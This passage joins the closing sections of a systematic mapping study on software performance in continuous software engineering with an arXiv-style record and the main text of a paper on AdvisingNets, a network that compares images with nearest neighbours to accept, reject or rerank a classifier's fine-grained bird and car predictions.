are necessary to reduce uncertainty in CSE and DevOps; * Using higher abstraction level (i.e. by means of a model-based framework or (domain-specific) languages and automation mechanisms) can help in reducing the effort of integrating heterogeneous methods and components in systems. ## 9 Threats to Validity Systematic Literature Review results might be affected by some threats mainly related to the correctness and completeness of the survey. In this section, we determined these threats according to the guidelines proposed by Wohlin et al. [12]: construct, internal, external, and conclusion validity threats. Moreover, we identified the actions required to mitigate them. ### Construct validity Construct validity is related to the generalization of the result to the concept or theory behind the execution of the study execution [12]. We identified the threats related to the potentially subjective analysis of the selected studies. As recommended by the guidelines of Kitchenham [11], data extraction was performed independently by two or more researchers and, in case of discrepancies, a third author was involved in the discussion to resolve any disagreement. The quality of each selected paper was checked according to the protocol proposed by Dyba and Dingsoyr [13]. ### Internal validity Internal validity threats are related to possible incorrect conclusions about the causal relationships between the treatment and outcome [12]. In the case of secondary studies, internal validity represents how well the findings represent those reported in literature. To address these threats, we rigorously defined the study protocol, including the data-extraction form. The data extraction form was first validated by all authors by extracting information from 10 randomly selected papers. Considering the data analysis process, threats are minimal, as we only adopted descriptive statistical techniques when dealing with quantitative data. When considering qualitative data, keywords were defined using a semi-automated approach to transform them into quantitative data. As regards to keyword definition, we first applied natural language techniques to reduce the subjectivity of the terms selected and then manually refined the keywords collaboratively. Finally, 10 studies were randomly selected by all the researchers to verify whether the results were consistent, independent of the researcher performing the extraction. Disagreements were discussed and resolved collaboratively when needed. ### External validity External validity threats are related to the ability to generalize the result [12]. In secondary studies, the external validity depends on the representativeness of the selected studies. If the selected studies are not externally valid, the synthesis of their content are not be valid. In our study, we were not able to evaluate the external validity of all the included studies. To address this threat, we applied our search string to multiple bibliographic sources, including the Springer Link, Scopus, ACM Digital Library, and IEEEXplore Digital Library. The usage of different bibliographic sources enabled us to guarantee to obtain the vast majority of papers. Moreover, we also complemented our search by performing a snowballing activity. The inclusion of papers written only in English may have biased our results. Studies in other languages may be relevant. However, we have adopted English only as it is the language most widely for scientific papers, and we can consider the bias related to this threat as minimal. We only included peer-reviewed papers, without considering grey literature (e.g., technical reports, master theses, and web forums, etc.). Because we aimed to identify only high-quality scientific studies, we believed that this threat was minimal. ### Conclusion validity Conclusion validity is related to the reliability of the conclusions drawn from the results [50]. One of these is related to the potential non-inclusion of some studies. To mitigate this threat, we carefully applied the search strategy and performed the search in eight digital libraries in conjunction with the snowballing process considering all the references presented in the retrieved papers and evaluating all the papers that reference the retrieved ones, which resulted in one additional relevant paper. We applied a broad search string, leading to a large set of articles and enabled us to include more possible results. We defined the inclusion and exclusion criteria and first applied them to the title and abstract. However, we did not rely exclusively on titles and abstracts, but before accepting a paper based on the title and abstract, we browsed the full text and applied our inclusion and exclusion criteria again. Another possible conclusion validity threat is related to the incorrect interpretation of the results. To mitigate this threat, all authors carefully reviewed the results. However, other researchers may provide different interpretations. ## 10 Conclusion This paper presented a mapping study on the architectural support for SP within CSE. Of 215 relevant studies, we selected \(66\) primary studies, which were analyzed to answer our research questions. Thus, we have given a deeper look at the research context, and therefore we provided ideas to researchers and developers to address the challenges related to this topic, including the fact that knowledge gaps and future topics of research have not yet been thoroughly investigated in this context. In particular, we analyzed the publication trends, the research areas and target systems, target problems and contributions, and specific characteristics of the selected primary studies through a classification framework. This study shows that SP and SA are aspects well considered in CSE, where the most affected dimensions are continuous monitoring and continuous improvement. The results of this study also show that SPE approaches and methodologies are sufficiently mature (owing to the support of specific frameworks and tools) to be applied in continuous practices, with a prevalence in the use of data monitored at runtime. In general, SA is considered to offer specific support; in many cases, SA models are used as input for the analysis and prediction of performance as well as architectural parameters and configurations. More support has been provided to distributed systems, component-based systems, SOA, micro services, and software intensive systems in general. Other contexts, such as data-intensive or embedded systems, have fewer applications. The most interesting gaps are identified in cloud systems and systems where uncertainty needs to be investigated. ## Acknowledgments This work was partially supported by the Adams grant from the Ulla Tuominen Foundation (Finland) and the MuFAno grant from the Academy of Finland (grant n. 349488), the AIDOaRt project grant from the ECSEL Joint Undertaking (JU) (grant n. 101007350), Territori Aperti project funded by Fondo Territori, Lavoro e Conoscenza CGIL CISL UIL, and SoBigData RI project funded by H2020-INFRAIA-2019-1 EU (grant n. 871042). Daniele Di Pompeo is supported by the European Union - NextGenerationEU - National Recovery and Resilience Plan (Piano Nazionale di Ripresa e Resilienza, PNRR) - Project: "SoBigData.it - Strengthening the Italian RI for Social Mining and Big Data Analytics" - Prot. IR0000013 - Avviso n. 3264 del 28/12/2021. Michele Tucci is supported by the OP RDE project No. CZ.02.2.69/0.0/0.0/18_053/0016976 "International mobility of research, technical and administrative staff at Charles University".
2308.13651
PCNN: Probable-Class Nearest-Neighbor Explanations Improve Fine-Grained Image Classification Accuracy for AIs and Humans
Nearest neighbors (NN) are traditionally used to compute final decisions, e.g., in Support Vector Machines or k-NN classifiers, and to provide users with explanations for the model's decision. In this paper, we show a novel utility of nearest neighbors: To improve predictions of a frozen, pretrained image classifier C. We leverage an image comparator S that (1) compares the input image with NN images from the top-K most probable classes given by C; and (2) uses scores from S to weight the confidence scores of C to refine predictions. Our method consistently improves fine-grained image classification accuracy on CUB-200, Cars-196, and Dogs-120. Also, a human study finds that showing users our probable-class nearest neighbors (PCNN) reduces over-reliance on AI, thus improving their decision accuracy over prior work which only shows only the most-probable (top-1) class examples.
Giang, Nguyen, Valerie Chen, Mohammad Reza Taesiri, Anh Totti Nguyen
2023-08-25T19:40:56Z
http://arxiv.org/abs/2308.13651v5
# AdvisingNets: Learning to Distinguish Correct and Wrong Classifications ###### Abstract Besides providing insights into how an image classifier makes its predictions, nearest-neighbor examples also help humans make more accurate decisions. Yet, leveraging this type of explanation to improve both human-AI team accuracy and classifier's accuracy remains an open question. In this paper, we aim to increase both types of accuracy by (1) comparing the input image with post-hoc, nearest-neighbor explanations using a novel network (AdvisingNet), and (2) employing a new reranking algorithm. Over different baseline models, our method consistently improves the image classification accuracy on CUB-200 and Cars-196 datasets. Interestingly, we also reach the state-of-the-art human-AI team accuracy on CUB-200 where both humans and an AdvisingNet make decisions on complementary subsets of images. ## 1 Introduction A goal of Explainable AI (XAI) is to provide humans with insights to evaluate the predictions of classifiers. By examining how a model "reasons" about a given input, users can better decide whether a classifier makes a correct prediction or not [3]. In computer vision, this is a non-trivial task and many explanation methods (such as feature-attribution maps) fail to improve human accuracy [13, 14, 15]. In contrast, there is growing evidence demonstrating the effectiveness of example-based explanations in improving human decisions, particularly when using techniques like nearest neighbors (NNs) [16, 17, 18, 19]. Intuitively, if the input image is more similar to its nearest neighbors (NNs) from the classifier's top-1 predicted class than those from the other classes, then the top-1 label should be correct and so accepted by human users (see Fig. 1). Otherwise, the top-1 label should be incorrect and rejected by users. Inspired by this idea, we train a VisionTransformer-based classifier called AdvisingNet (Fig. 2b) that predicts whether the output label of a given classification model is correct or wrong by comparing the input image with its nearest neighbors. To train AdvisingNets, we propose a novel sampling procedure to generate image pairs, which consist of the input image and its nearest neighbors derived from both the ground-truth and the other classes. We demonstrate the utility of AdvisingNets on fine-grained CUB-200 [23] and Cars-196 [15] classification tasks. Our main findings are: * On CUB-200, AdvisingNets achieve up to 90.63% in predicting correct vs. wrong predictions, surpassing the human baseline by +25.88 points (pts), an optimized AI agent by +3.23 pts, and a team of human+AI by +4.80 pts (Table 1). * We propose an algorithm called Top-class Reranking (TCR) that re-ranks the top-predicted classes of pre-trained classifiers. TCR improves the accuracy of a bird classifier (based on an iNaturalist-pretrained ResNet-50 backbone) by +2.17 pts on CUB-200 (Table 2) and a car classifier (based on ImageNet-pretrained ResNet-50 backbone) by +0.64 pts on Cars-196 (Table 3). On CUB, our method also outperforms other prototype-based classifiers, such as prototypical part-based (e.g., ProtoPNet) and visual correspondence-based classifiers. * We find that AdvisingNets when used with TCR do not only improve the accuracy of target classifiers seen during training but also unseen classifiers plugged in during Figure 1: Given an input image \(x\) and a pretrained, frozen (denoted by a ) classifier \(\mathbf{C}\) that predicts the output for \(x\), humans can discern whether the model has made a correct prediction or not by comparing \(x\) with its training-set nearest neighbors (NN), derived from the predicted classes [18]. In this paper, we train AdvisingNets to mimic humans and to choose **Painted Bunting** over the **Indigo Bunting** label for this example. test time. We find that the effectiveness of AdvisingNets generalizes over different target classifiers (when using TCR), different network architectures, and the number of nearest neighbors. ## 2 Framework We first present the details for training AdvisingNets and their two downstream tasks. ### Training AdvisingNets Problem formulationAssessing whether a classifier's prediction is correct or not is an inherent task that every stakeholder needs to perform when working on high-stakes AI applications. Inspired by prior work that shows the effectiveness of NN examples for humans to classify machine predictions (Fig. 1), we reduce the task from distinguishing between correct and incorrect predictions into assessing whether the input image \(x\) and its NNs from predicted classes are of the same class (i.e., similarity prediction). Let \(\mathbf{C}\) be an image classifier that transforms an image \(x\) into a softmax probability distribution \(\mathbf{P}\) over all classes. \(x\) has a ground-truth label \(y\) (e.g. Painted Bunting in CUB; Fig. 1). Let \(A\) be a binary, image-comparison classifier that takes in two images and predicts whether they belong to the same class (Fig. 2b). We call this classifier an AdvisingNet because when coupled with the TCR algorithm, we can improve \(\mathbf{C}\)'s predictions by pinpointing the ground-truth label that is probable to be among the top-predicted classes (Sec. 2.2). Let \(\mathbf{T}\) be a set of top-ranked classes in \(\mathbf{P}\). From each class in \(\mathbf{T}\), we retrieve the nearest neighbors \(x_{nn}\) of \(x\) to establish image pairs \((x,x_{nn})\) for training \(A\). The pair is labeled 1 (positive) if \(x_{nn}\) is selected from the groundtruth class \(y\). Otherwise, for a negative pair having label 0, \(x_{nn}\) is sampled from a class different from \(y\) (Fig. 2a). For each pair \((x,x_{nn})\), \(A\) computes a logit score \(s\in\mathbb{R}\), which is then converted into a probability using a sigmoid function, \(\hat{y}=\sigma(s)\), where \(\sigma(s)=\frac{1}{1+e^{-s}}\). The resulting value, a probability, is thresholded at 0.5 to yield the final binary classification (see Fig. 2b). With \(B\) training samples, and a true binary label \(y_{i}\) (Accept or Reject) for each \(i\)-th sample pair, we train \(A\) to minimize the following binary cross-entropy (BCE) loss: \[L_{BCE}=-\frac{1}{B}\sum_{i=1}^{B}y_{i}\log(\sigma(s_{i}))+(1-y_{i})\log(1- \sigma(s_{i})) \tag{1}\] Sampling positive and negative neighborsGiven an input image \(x\), instead of randomly picking NNs for generating \((x,x_{nn})\) pairs, we propose a novel sampling method that selectively chooses \(x_{nn}\) based on the output of the pre-trained model \(\mathbf{C}\) on \(x\) as shown in Fig. 2a. For each image in the top-\(Q\) classes, we mark the \((x,x_{nn})\) pairs as positive (+) or negative (-) accordingly, depending on whether the ground-truth label of \(x\) matches these classes (see Fig. 2a). To help AdvisingNets detect subtle differences between similar-looking species (which are more often misclassified and co-present in the top-predicted classes [11, 12]), we consider only the top-\(Q\) classes (empirically, \(Q\in\{3,5,10,15\}\)) returned by the classifier \(C\) for an input \(x\). NNs taken from classes outside the top-\(Q\) are often clearly different from the input \(x\) and do not serve as _hard_ negatives. With one image per class, this sampling strategy yields at most 1 positive instance and at least \(Q-1\) negative instances (e.g., \(Q\) negative instances if the ground-truth label does not appear in the top \(Q\) classes). Given that \(x\) is previously part of the training set for classifier \(\mathbf{C}\), it is likely that the top-1 predicted class matches the ground-truth label. To increase the number of positive samples and help AdvisingNets deal with inter-class variations, we sample \(K\) neighbors from the top-1 class to derive \(K\) positive pairs. The retrieved nearest neighbors are ranked based on the Euclidean distances (using faiss framework) between their embeddings (i.e., the average pooling features of the last conv layer of \(\mathbf{C}\)) and that of the input image. Note that the first nearest neighbor from the ground-truth class is typically the same with \(x\) itself. As such, we exclude this pair. For each sample \(x\), we thus form \(Q+K-1\) pairs for training AdvisingNets. When the top-1 predicted class matches the ground-truth label, our method generates K positive pairs and \(Q-1\) negative pairs. In contrast, when the top-1 predicted class does not match the ground-truth label, we obtain a minimum of \(Q+K-2\) negative pairs and a maximum of one positive pair. Refer to Sec. A12 for examples of training pairs. Hybrid architectureAdvisingNets harness the power of both convolutional and Transformer layers (Fig. 2b). We initialize the convolutional layers with pretrained weights from \(\mathbf{C}\) to encode input images. For the Transformer layers, we adopt the CrossViT backbone [10] for comparing the features between two images. The two branches correspond to the two input images fed into AdvisingNets. Different from CrossViT, our two branches handle the same image scale and share the weights, which makes AdvisingNets more compact. We also exclude the linear projection in conventional ViT [13] as the conv layers are already able to provide patch-level tokens. In sum, the layers of AdvisingNets are: \[\begin{split}&\mathbf{x}_{\text{conv1}}=\mathbf{f}\left(\mathbf{x} \right);\quad\quad\mathbf{x}_{\text{conv2}}=\mathbf{f}\left(\mathbf{x}_{nn} \right)\\ &\mathbf{x}_{1}=\left[\mathbf{x}_{cls}\|\mathbf{x}_{\text{conv1}} \right.\right]+\mathbf{x}_{\text{pos}}\,;\mathbf{x}_{2}=\left[\mathbf{x}_{cls} \|\mathbf{x}_{\text{conv2}}\right]+\mathbf{x}_{\text{pos}}\\ &\mathbf{y}_{1}=\mathbf{x}_{1}+\mathbf{MHSA}(\mathbf{x}_{1}); \mathbf{y}_{2}=\mathbf{x}_{2}+\mathbf{MHSA}(\mathbf{x}_{2})\\ &\mathbf{z}1,\mathbf{z}2=\mathbf{CrossAtt}\left(\mathbf{y}_{1}, \mathbf{y}_{2}\right)\\ &\mathbf{o}=\text{concat}\left(\mathbf{z}_{1}[0,:],\mathbf{z}_{ 2}[0,:]\right)\\ &\mathbf{s}=\mathbf{MLPs}\left(\mathbf{o}\right)\end{split} \tag{2}\] First, output of the conv layers \(\mathbf{f}\) has a shape of \(\mathbb{R}^{D\times H\times W}\), where \(D\) is the number of convolution channels. \(\mathbf{x}_{cls}\in\mathbb{R}^{1\times D}\) and \(\mathbf{x}_{\text{pos}}\in\mathbb{R}^{(1+N)\times D}\) are CLS token and positional embedding, respectively. Each image is represented by \(H\times W\) patch tokens with a dimension of \(D\). We flatten and transpose the conv fea ture vectors of two images to get \(\mathbf{x}_{\text{com/1}}\), \(\mathbf{x}_{\text{com/2}}\in\mathbb{R}^{N\times D}\) (e.g., \(N=49\) and \(D=2048\) for ResNet-50 conv4). After adding CLS token and positional embedding, the two encoded images \(\mathbf{x}_{1}\) and \(\mathbf{x}_{2}\in\mathbb{R}^{(1+N)\times D}\) are put into the Transformer layers. \(\mathrm{MHSA}\) is the self-attention operator and \(\mathrm{CrossAttn}\) denotes the Cross-Attention token fusion approach in CrossViT, producing \(\mathbf{y}_{1}\)\(\mathbf{y}_{2}\), and \(\mathbf{z}_{1}\)\(\mathbf{z}_{2}\)\(\in\mathbb{R}^{(1+N)\times D}\). Then, we extract the CLS tokens from \(\mathbf{z}_{1}\)\(\mathbf{z}_{2}\) and concatenate to generate \(\mathbf{o}\in\mathbb{R}^{2\times D}\), which serves as input for multilayer perceptrons (MLPs). The MLPs output a logit score \(\mathbf{s}\in\mathbb{R}\) that quantifies the degree of similarity between the two input images. Finally, a sigmoid layer is applied to achieve the confidence score for the classifier. Thresholding is performed at \(0.5\) to yield binary predictions. ### Downstream applications of AdvisingNets #### Task 1: Human-AI teaming on Accepting/Rejecting AI decisions We follow the experimental setups for human-AI collaboration from [11], where humans and AIs work on complementary image subsets to accept and reject a pretrained model's predictions. In the original setup, a confidence threshold was computed to determine for which instances the human or the AI should be making decisions so that the AI would only make decisions for instances it was most confident on. Our approach substitutes the naive AI agent, referred to as Thresholding, with the AdvisingNet (see Sec. A4 for further details). #### Task 2: Single-label image classification While AdvisingNets can differentiate correct and incorrect predictions of a pretrained classifier \(\mathbf{C}\), we study how to use them to improve \(\mathbf{C}\) in image classification tasks. We introduce an algorithm called **Top-classes Reranking** or TCR (Algorithm 1), which _re-ranks_ the top-predicted classes, initially given by \(\mathbf{C}\). Specifically, upon receiving an image \(x\), \(\mathbf{C}\) makes an initial set of predictions \(\mathbf{P}\). The top-\(Q\) classes are selected for re-ranking (L2-4), where for each of class, AdvisingNet computes a confidence score between the input image \(x\) and the representative image of the class (the closest NN). The class that yields the highest confidence score is chosen as the final predicted class for the input image (L9-20). By focusing on the top-\(Q\) classes as predicted by \(\mathbf{C}\), this Figure 2: (a) Our sampling method generates positive and negative pairs based on top-predicted labels on \(x\) from a pre-trained, frozen () classifier \(\mathbf{C}\). In this example, the ground-truth label of \(x\) is Painted Bunting, which matches the top-1 class, yielding \(K\) positive pairs. In contrast, \(Q-1\) classes do not match the ground-truth label and each provides a negative pair. Ultimately, this forms a collective \(Q+K-1\) pairs per sample \(x\) for the training of AdvisingNets. (b) AdvisingNet architecture consists of both convolutional and Transformer layers. The network processes a pair of images \((x,x_{nn})\) as input and produces a score \(\mathbf{s}\in\mathbb{R}\). This score is subsequently passed through a sigmoid layer \(\sigma\) to determine if the images are of the same class. \(L\), \(M\), and \(N\) are the depths of the corresponding blocks. strategy mitigates issues associated with the long-tail distribution often encountered in classification problems (i.e., reducing the influence of less likely "tail" classes). Additionally, this approach provides an added degree of interpretability since the decision-making process is based on pairwise image comparisons, allowing for an intuitive understanding of the class assignments (see Fig. 3 and Sec. A13). ## 3 Experimental setups ### Datasets We evaluate AdvisingNets on two datasets that have been widely utilized for benchmarking prototype-based classifiers [1, 13, 14] and explanation methods [15, 16]: 1. **CUB-200-2011** (hereafter, CUB-200) is a collection of 11,788 images (5,994 for training and 5,794 for test) across 200 bird species; 2. **Stanford Cars** (hereafter, Cars-196) is a car dataset that includes 16,185 images (8,144 for training and 8,041 for test) spanning 196 distinct classes. ### Pretrained classifiers **C** For CUB-200, we use a ResNet-50 model pretrained on the iNaturalist dataset and finetuned on CUB-200 (85.83% top-1 accuracy) from [11]. About Cars-196, we choose three ResNet models [1] (i.e., ResNet-18: 86.17%, ResNet-34: 82.99%, and ResNet-50: 89.73%), all pretrained on ImageNet and finetuned on Cars-196. ### Training parameters We use Stochastic Gradient Descent (SGD) to train AdvisingNets, where convolutional layers are trainable (see Sec. A3), and adopt OneCycleLR [14] for learning rate scheduling. Additionally, TrivialAugment [15] is applied to image pairs during training. This augmentation technique plays a crucial role in training AdvisingNets as it reduces overfitting (see Sec. A10). For CUB-200, we train AdvisingNets over 100 epochs with a batch size of 256 and a learning rate of \(0.001\). The model architecture for this dataset is defined by \(M=N=4\) and \(L=2\). For Cars-196, we use the same batch size and number of epochs, but adjust the initial learning rate to \(0.01\). The architecture of the model employed for this dataset is specified by \(M=N=3\) and \(L=3\). Unless specified differently, both the self and cross-attention Transformer blocks utilize 8 heads, and for the sampling process, \(Q=K=10\). More training details are in Sec. A1. ### Human-AI team set-ups We consider multiple decision-making setups which range from human or AI model only to human-AI teams for the task of predicting whether **C** is correct or wrong: _Human only_: In this setting, humans are assigned all instances to make decisions and are provided with kNN explanations (because AdvisingNets also leverage NNs). _AI auto-accept_: This setting involves only the AI agent **C** and the top-1 predicted label of **C** will be automatically accepted. _AI Thresholding_: Instead of automatically accepting all predictions, this setting identifies the optimal threshold on the confidence score of **C** on a validation set. In test, this threshold is used to determine whether to accept or reject decisions. _Human-Thresholding_: This setup delegates uncertain predictions of **C** to humans and auto-accepts the remaining. _Human-AdvisingNet_: In this setup, we replace the AI Thresholding agent with AdvisingNet. We train an AdvisingNet to align with the human-AI setup in [11, 14] where they split the 5,794 test samples into two groups, 1,000 for validation and 4,794 for test. The validation set is used to tune the performance of both human and AI before they work complementarily on the test examples. ### Baselines for image classification We present the baseline classifiers that we use in comparisons with AdvisingNets (+ Top-classes Reranking) for multi-class image classification tasks.1 Please see Sec. A2 for further details and the rationale behind choosing these baseline classifiers. Footnote 1: Note that all baselines follow the same training procedures (i.e., train/test samples are 5,994/5,794 for CUB-200 and 8,144/8,041 for Cars-196). _Parametric classifiers_ (Deep CNNs): We compare against ResNet classifiers that have been trained to classify 200 Bird and 196 Car categories. _Non-parametric classifiers_ (kNN): kNN classifiers leverage comparisons with training prototypes to derive predicted labels. We consider kNN-RN50 and kNN-AdvNet, which uses embeddings from RN50 or AdvisingNets respectively, and select \(k=20\) as in [11]. _Prototypical part-based classifiers_: We are interested in the comparisons with ProtoPNet [31], ProtoToTree [25], ProtoPool [12], Deformable ProtoPNet [13], and ProtoKNN [25]. _Correspondence-based classifiers_: For CUB-200, we compare against EMD-Corr and CHM-Corr [11], the two visual correspondence-based classifiers that also perform re-ranking. ## 4 Experimental results We evaluate AdvisingNets on two important downstream scenarios: substituting AdvisingNet in human-AI teams and using AdvisingNet (+ TCR) to improve classifier \(\mathbf{C}\) in image classification. ### AdvisingNets improve human-AI team accuracy in Accepting/Rejecting AI decisions Due to the absence of human data for Cars-196, we focus our investigation of human-AI teaming on CUB-200. As demonstrated in Table 1, AdvisingNets significantly outperforms prior baselines. When benchmarked against humans provided with nearest-neighbor explanations, AdvisingNet achieves a substantial increase in accuracy of +25.88 pts. Moreover, compared to an AI auto-accept agent, AdvisingNet improves classification performance by a margin of \(+4.80\) pts. In the case of AI Thresholding, AdvisingNet continues to show superior performance by beating it by +3.23 pts. Against a human + AI Thresholding team, AdvisingNet showcases its strength by enhancing the classification performance by +3.97 pts. Interestingly, we observe little improvement when comparing Human-AdvisingNet to the AdvisingNet alone. Since humans often struggle with fine-grained classification tasks [30, 31], integrating humans into the team does not necessarily improve performance. Thus, in scenarios where a highly capable AI agent like the AdvisingNet is involved, human intervention may not be required in the final decision-making step. Instead, the strength of advanced AI agents might be sufficient to drive accurate outcomes. ### AdvisingNets improve classifiers' accuracy **CUB-200 image classification** In Table 2, AdvisingNet (+ TCR) stands out with a top-1 classification accuracy of 88.00%, directly improving RN50 by +2.17 2 pts. Its performance also beats the results achieved by all of non-parametric, prototypical part-based, and correspondence-based classifiers on the challenging CUB-200 test set. Footnote 2: +Green texts denotes direct improvements over the pretrained model \(\mathbf{C}\). Compared to a non-parametric classifier (kNN-RN50) that achieves an accuracy of 85.46%, AdvisingNet demonstrates a clear advantage in classification accuracy. The poor performance of kNN-AdvNet is because the discriminative power has been shifted to the Transformer layers. This transition causes the kNN algorithm, working on the convolutional features, to significantly reduce the accuracy compared to using the original features of RN50, from 85.46% to 31.01%. Among the prototypical part-based classifiers, namely ProtoPNet, ProtoTree, ProtoPool, Def-ProtoPNet, and ProtoKNN, AdvisingNet maintains its lead with margins ranging from 1.00 to 6.90 pts. Additionally, when compared to the correspondence-based classifiers, EMD-Corr (84.98%) and CHM-Corr (83.27%), AdvisingNet's performance remains superior. The improvement of the CUB-200 RN50 classifier, as presented in Table 2, can be attributed to the power of the re-ranking algorithm (TCR). We illustrate this re-ranking in Fig. 3. For example, RN50 initially incorrectly classified the \begin{table} \begin{tabular}{|l|c|} \hline **Classifier** & **Acc (\%)** \\ \hline Human only \({}^{\dagger}\) & 64.75 \\ \hline AI auto-accept & 85.83 \\ \hline AI Thresholding \({}^{\dagger}\) & 87.40 \\ \hline Human-Thresholding \({}^{\dagger}\) & 86.66 \\ \hline AdvisingNet & 90.63 \\ \hline Human-AdvisingNet & 90.65 \\ \hline \end{tabular} \end{table} Table 1: Binary (accept/reject) classification accuracy of various human-AI team setups on 4,794 CUB-200 test samples. \({}^{\dagger}\)[11]. \begin{table} \begin{tabular}{|l|l|c|} \hline **Model type** & **Classifier** & **Top-1 Acc (\%)** \\ \hline Parametric & RN50\({}^{\dagger}\) & 85.83 \\ \hline \multirow{2}{*}{Non-parametric} & kNN–RN50\({}^{\dagger}\) & 85.46 \\ & kNN–AdvNet & 31.01 \\ \hline \multirow{4}{*}{Prototypical part-based} & ProtoPNet\({}^{\spadesuit}\) & 81.10 \\ & ProtoTree\({}^{\spadesuit}\) & 82.20 \\ \cline{1-1} & ProtoPool\({}^{\spadesuit}\) & 85.50 \\ \cline{1-1} & Def-ProtoPNet\({}^{\spadesuit}\) & 86.40 \\ \cline{1-1} & ProtoKNN\({}^{\spadesuit}\) & 87.00 \\ \hline \multirow{2}{*}{Correspondence-based} & EMD-Corr\({}^{\dagger}\) & 84.98 \\ \cline{1-1} & CHM-Corr\({}^{\dagger}\) & 83.27 \\ \hline AdvisingNet & TCR (Ours) & **88.00 \(\pm\) 0.11** \\ \hline \end{tabular} \end{table} Table 2: Top-1 classification accuracy of AdvisingNet and baselines on CUB-200 test set (5794 samples). We compute AdvisingNet accuracy over \(3\) random seeds (see Sec. A8). \({}^{\dagger}\)[11], ProtoPool (Rymarczyk et al., 2022), \({}^{\spadesuit}\)[11], using full, uncropped images w/o model ensemble. \({}^{\clubsuit}\)[11], \({}^{\clubsuit}\)[11], using \(k=1\) like AdvisingNets and margin. All models have ResNet-50 backbone that was pretrained on i-Naturalist 2017 [12]. query of **Green Jay** as **Indigo Bunting**. However, upon reviewing the top-predicted classes, The AdvisingNet determines that RN-50's second-highest predicted label is a better fit for the query image, subsequently identifying **Green Jay** as the correct classification for the query. We provide a more comprehensive set of examples in Sec. A13. Cars-196 image classificationIn Table 3, we present an analysis of top-1 classification accuracy on the **Cars-196** test set. Our proposed approach, AdvisingNet (+ TCR), outperforms both the non-parametric classifier (kNN-RN50) and the parametric classifier (RN50) by +2.89 pts and +0.64 pts, respectively. We also notice a similar drop in classification accuracy when utilizing retrained convolutional features (kNN-AdvNet), as seen in CUB-200. Among the prototypical part-based classifiers, ProtoPool achieves 88.90%, ProtoTree achieves 86.60%, and ProtoRNN achieves 90.20%. Notably, our proposed approach, AdvisingNet (Top-classes Reranking), excels with a remarkable top-1 classification accuracy of 90.37%. Both AdvisingNet and ProtoKNN stand out as top-performing models in this dataset. Model generalization tests for AdvisingNetsWhile we have shown that AdvisingNets (+ TCR) can improve the accuracy of pretrained models seen in training, we also wish to study their generalizability to pretrained models not seen during training (unseen models). To answer this question, we use an AdvisingNet trained on ResNet-50 (85.83% top-1 accuracy) to refine the predictions of NTS-Net [20] (87.43% top-1 accuracy) for CUB-200. For the Cars-196 dataset, we choose an AdvisingNet trained on ResNet-18 (86.17% top-1 accuracy) to improve the performance of MobileNet-V2 (87.49% top-1 accuracy). As summarized in Table 4, we find that AdvisingNets clearly improve the performance of unseen classifiers. The NTS-Net model, when tested on CUB-200, has been improved by +1.01 pts. Similarly, the MobileNet-V2 model on Cars-196 benefits from a +0.40 pts increase in accuracy. This is intriguing because AdvisingNets have never seen the distributions of top-predicted classes and the retrieved NNs from such out-of-training classifiers. Additionally, we test whether AdvisingNets can boost the accuracy of pretrained classifiers beyond RN50 by training two AdvisingNets using RN34 and RN18 for Cars-196, with results detailed in Sec. A6 and A9. Interestingly, we also achieve improvements of +1.15 pts for RN34 and +0.83 pts for RN18 in Cars classification. Hyperparameter tests for AdvisingNetsAs mentioned in Sec. 2.1, AdvisingNets learn to compare the input query with a _single_ nearest neighbor. We expand this by averaging results from 3 or 5 pairwise comparisons in test. We find that using more NNs for comparisons marginally enhances the performance but also incurs higher computational cost (see Sec. A7 for details). Finally, our experiments opt for empirical settings with \(Q=K=10\). We delve into different values of \(Q\) and \(K\) in Sec. A11. Although smaller values considerably diminish AdvisingNet's performance, we observe a slight improvement in accuracy when increasing these values from 10 to 15. ## 5 Related Works Learning from nearest-neighbor-based positive and negative pairs.Contrastive learning is a self-supervised learning technique that aims to maximize the agreement between positive pairs and minimize it between negative pairs to learn more meaningful representations. Nearest neighbors have emerged as a key component in the sample selection step of contrastive learning pipelines [14, 15, 16, 17]. While training Advisingnets also utilizes positive and negative instances as in contrastive learning approaches, our training pipeline differs in that we leverage the top-predicted labels of a pretrained model to determine the classes for sampling. Moreover, while existing works typically optimize for contrastive loss functions like InfoNCE [16], we directly train a binary classification model using cross entropy loss, which simplifies the training process. Effective AI agents for human-AI teaming.One of the applications studied in this work is human-AI teaming, which refers to setups where humans and AI agents work together to make better and more responsible decisions than either could achieve solo. In many setups, AI agents support humans who are the final decision-makers [18] or they might simply rely on model uncertainty [19] in decision-making, leading to reduced human-AI performance and potential fragility in OOD environments where models exhibit high confidence but make erroneous predictions [20]. \begin{table} \begin{tabular}{|l|c|c|c|} \hline **Dataset** & **Seen classifier** & \multicolumn{2}{c|}{**Unseen classifier**} \\ \hline \multirow{2}{*}{CUB-200} & **RN50** & **NTS-Net** & **Improved** \\ \cline{2-4} & 85.83 & 87.43 & 88.44 (+1.01) \\ \hline \multirow{2}{*}{Cars-196} & **RN18** & **MobileNet-V2** & **Improved** \\ \cline{2-4} & 86.17 & 87.49 & 87.89 (+0.40) \\ \hline \end{tabular} \end{table} Table 4: Top-1 classification accuracy (%) of unseen classifiers before and after working with AdvisingNets. \begin{table} \begin{tabular}{|l|l|c|} \hline **Model type** & **Classifier** & **Top-1 Acc (\%)** \\ \hline Parametric & RN50\({}^{\dagger}\) & 89.73 \\ \hline \multirow{2}{*}{Non-parametric} & kNN-RN50\({}^{\dagger}\) & 87.48 \\ & kNN-AdvNet & 16.90 \\ \hline \multirow{3}{*}{Prototypical part-based} & ProtoTree\({}^{\clubsuit}\) & 86.60 \\ & ProtoPool\({}^{\clubsuit}\) & 88.90 \\ \cline{1-1} & ProtoKNN\({}^{\clubsuit}\) & 90.20 \\ \hline AdvisingNet & TCR (Ours) & 90.37 \(\pm\) 0.04 \\ \hline \end{tabular} \end{table} Table 3: Top-1 classification accuracy of AdvisingNet and baselines on Stanford Cars-196 test set (8041 samples). We compute AdvisingNet accuracy over \(3\) random seeds (see Sec. A8). \({}^{\dagger}\) [15]; and Clune 2015). In response to these challenges, we introduce AdvisingNet, an effective AI agent designed to make decisions by considering both the input image and external knowledge sources (i.e., training nearest neighbors). Ranking-based image classification.A second task studied in this work is the use of AdvisingNet to improve a pretrained image classifier. In general, image classification models are typically softmax-based classifiers, which rank all potential classes using logit scores and designate the highest-scoring class as the predicted label for a given image. In contrast, ProtoPNet (Chen et al. 2019), an interpretable model that classifies images by matching parts of the input image to patch prototypes found in the training set, determines the class rankings via the similarity between the input features and those of each class. This strategy is also found in k-nearest neighbors (kNN) algorithms, where the nearest neighbors are ranked based on the similarity to the input image (Papernot and McDaniel 2018). There have recently been proposals for re-ranking the neighbor candidates retrieved from kNN classifiers to refine the initial predictions using both image-level and patch-wise comparisons 